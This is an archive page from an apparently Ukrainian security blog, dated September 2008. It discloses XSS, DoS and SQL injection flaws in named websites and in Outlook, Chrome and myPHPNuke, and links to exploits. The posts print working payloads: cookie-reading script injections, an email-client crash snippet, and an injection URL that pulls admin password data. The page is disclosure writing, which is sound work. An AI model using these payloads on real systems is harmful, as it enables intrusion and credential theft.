Архів для категорії 'Уразливості'

Уразливості на finance.ua

20:30 17.09.2008

03.04.2008

У вересні, 16.09.2007, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на проекті http://finance.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

17.09.2008

XSS:

POST запит на сторінці http://finance.ua/ru/feedback
"><script>alert(document.cookie)</script>В полях: Ваше имя, Ваш E-mail.

</textarea><script>alert(document.cookie)</script>В полі: Ваше сообщение.

Дані уразливості вже виправлені.

Insufficient Anti-automation:

В контактній формі немає захисту від автоматизованих запитів.

А ось дана уразливість досі не виправлена.

DoS в Microsoft Outlook

23:52 16.09.2008

Сьогодні я виявив Denial of Service уразливість в Microsoft Outlook. Вразлива версія Outlook 2002 (SP-2) та попередні версії (2002 до SP-2 та вірогідно 2000 та попередні). Наступні версії (2003, 2007) також можуть бути вразливі.

DoS уразливість пов’язана з використанням в стилі html-листа властивості position:relative. Дана уразливість ідентична DoS в Outlook Express, про яку я писав раніше.

Експлоіт:

Для атаки потрібно надіслати html-лист на емайл користувача Outlook, що містить в тілі спеціальний код. Експлоіт такий самий, як і для Outlook Express.

DoS exploit

При перегляді цього листа програму виб’є.

P.S.

Як я вияснив, уразливість знаходиться в бібліотеці mshtml.dll.

Добірка уразливостей

17:34 16.09.2008

В даній добірці уразливості в веб додатках:

DoS в Microsoft Outlook Express

23:56 15.09.2008

Сьогодні я виявив Denial of Service уразливість в Microsoft Outlook Express (для Windows XP). Вразлива версія Outlook Express 6.00.2900.2180 та попередні версії. Windows Mail для Windows Vista також може бути вразливим.

DoS уразливість пов’язана з використанням в стилі html-листа властивості position:relative. Дана атака пов’язна з DoS в Internet Explorer, про яку я писав раніше, бо Outlook Express використовує IE для рендерингу html-листів.

Експлоіт:

Потрібно надіслати html-лист на емайл користувача Outlook Express, що містить в тілі наступний код.
<style>*{position:relative}</style>
<table>DoS</table>

DoS exploit

При перегляді цього листа поштовий клієнт виб’є.

P.S.

Як я вияснив, уразливість знаходиться в бібліотеці mshtml.dll.

Нові уразливості на www.banner.kiev.ua

19:38 15.09.2008

31.03.2008

У вересні, 08.09.2007, а також додатково сьогодні, я знайшов нові Cross-Site Scripting уразливості на проекті http://www.banner.kiev.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.banner.kiev.ua.

Детальна інформація про уразливості з’явиться пізніше.

15.09.2008

XSS:

Дані три уразливості більше не працюють після проведених технічних робіт на сайті.

XSS:

Дані уразливості досі не виправлені.

SQL Injection уразливість в myPHPNuke

23:54 13.09.2008

У серпні, 24.08.2008, після знайдення попередніх, я знайшов нову SQL Injection уразливість в системі myPHPNuke. Дірку я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

SQL Injection:

http://site/download.php?op=viewdownload&cid=-1%20union%20select%20concat(aid,char(45),pwd)%20from%20mpn_authors%20limit%200,1

Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії наявні додаткові фільтри). При цьому остання версія системи також уразлива - в ній можлива обмежена SQL Injection атака.

Добірка уразливостей

17:36 13.09.2008

В даній добірці уразливості в веб додатках:

  • Bilder Uploader 1.3 Remote Command Execution Vulnerability (деталі)
  • Mapos Bilder Galerie Version 1.0 Remote Command Execution Vulnerability (деталі)
  • Gstebuch Version 1.5 Remote Command Execution Vulnerability (деталі)
  • File Uploader Version 1.1 Remote Command Execution Vulnerability (деталі)
  • FinDix Remote File Inclusion Vulnerability (деталі)
  • phpMyAdmin multiple XSS vuln. (деталі)
  • Storesprite XSS vuln. (деталі)
  • eSoft InstaGate EX2 Cross-Site Request Forgery Attack (деталі)
  • IBM Rational ClearQuest Web SQL Injection Login Bypass (деталі)
  • Olate Download 3.4.1 ~ admin.php ~ Admin authentication bypassing (деталі)

Захоплення акаунту адміна в WordPress 2.6.1

23:50 12.09.2008

Як я вже писав, нещодавно була виявлена SQL Column Truncation уразливість в WordPress. І два дні тому з’явився експлоіт, призначений для захоплення акаунту адміна. Уразлива версія WordPress 2.6.1 та попередні версії.

Уразливість пов’язана з особливостями роботи MySQL. Використовуючи дірку, можна змінити пароль адміна. А з новим експлоітом, який також використовує Brute Force уразливість в WordPress (що наявна в усіх версіях WP), відбувається підбір нового пароля. Як і у випадку першого експлоіта, для атаки необхідно, щоб на сайті була відкрита реєстрація.

  • Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit (деталі)

Уразливість на webmoney.ru

21:12 12.09.2008

28.03.2008

У вересні, 13.09.2007, я знайшов Cross-Site Scripting уразливість на http://webmoney.ru - сайті відомої електронної платіжної системи (зокрема в локальному пошуці http://search.webmoney.ru). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно сайтів електронних платіжних систем останній раз я писав про уразливість на cyberplat.ru.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.09.2008

XSS:

Дана уразливість вже виправлена.

Нова DoS уразливість в Google Chrome

22:49 11.09.2008

Нещодавно, 04.09.2008, я виявив нову Denial of Service уразливість в браузері Google Chrome.

В даному випадку Chrome не виявляє завантаженності процесора, що призводить до перенавантаження комп’ютера (браузер не вилітає, тому це потенційний DoS). Що може бути вирішено лише закриттям необхідного таба чи браузера. При запуску експлоіта Хром одразу починає забирати 100% процесорних ресурсів, що перенавантажує увесь комп’ютер (CPU overload).

Експлоіт:

Google Chrome DoS Exploit-4.html

Уразлива версія Google Chrome 0.2.149.29 та попередні версії.